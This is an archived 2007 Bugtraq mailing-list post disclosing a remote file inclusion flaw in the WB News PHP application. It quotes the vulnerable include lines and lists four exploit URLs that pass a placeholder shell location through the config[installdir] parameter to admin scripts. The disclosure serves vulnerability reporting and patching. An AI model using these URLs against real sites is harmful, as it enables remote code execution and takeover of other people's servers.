Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

bugtraq logo Bugtraq mailing list archives

WB News Remote File Include in all versions
From: mostafa_ragab () msn com
Date: 1 Mar 2007 16:54:29 -0000
ThE bug in admin file
*******************************************************************************

To ConTacT mE @ www.Asb-May.net/bb
ScRiPtS:-http://www.webmobo.com/wbnews/download.html
GrEaTz To:-ToOofa-HaCk.eGy (All AsB-MaY DisCoverY ExPloIts GrOup)
Discovered By:- ThE dE () Th <<{AsB-MaY DiScOvEr ExPlIoTs Gr0uP} >>

******************************************************************************

comment.php:-
include $config['installdir']. "/includes/function.php";
themes.php:-
include $config['installdir']."/templates/".$them['THEME_DIRECTORY']."/admin/theme_info.php";
directory.php:-
include $config['installdir']."/templates/".$them['THEME_DIRECTORY']."/admin/theme_info.php";
sendmsg:-
include $config['installdir']."/templates/".$them['THEME_DIRECTORY']."/admin/theme_info.php";

*******************************************************************************

ExPlOiT:-http://www.SitE.*/[WBNewSPaTh]/admin/comment.php?config[installdir]=[Shell]
ExPlOiT:-http://www.SitE.*/[WBNewSPaTh]/admin/themes.php?config[installdir]=[Shell]
ExPlOiT:-http://www.SitE.*/[WBNewSPaTh]/admin/directory.php?config[installdir]=[Shell]
ExPlOiT:-http://www.SitE.*/[WBNewSPaTh]/admin/sendmsg.php?config[installdir]=[Shell]


*******************************************************************************

  By Date           By Thread  

Current thread:
  • WB News Remote File Include in all versions mostafa_ragab (Mar 01)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]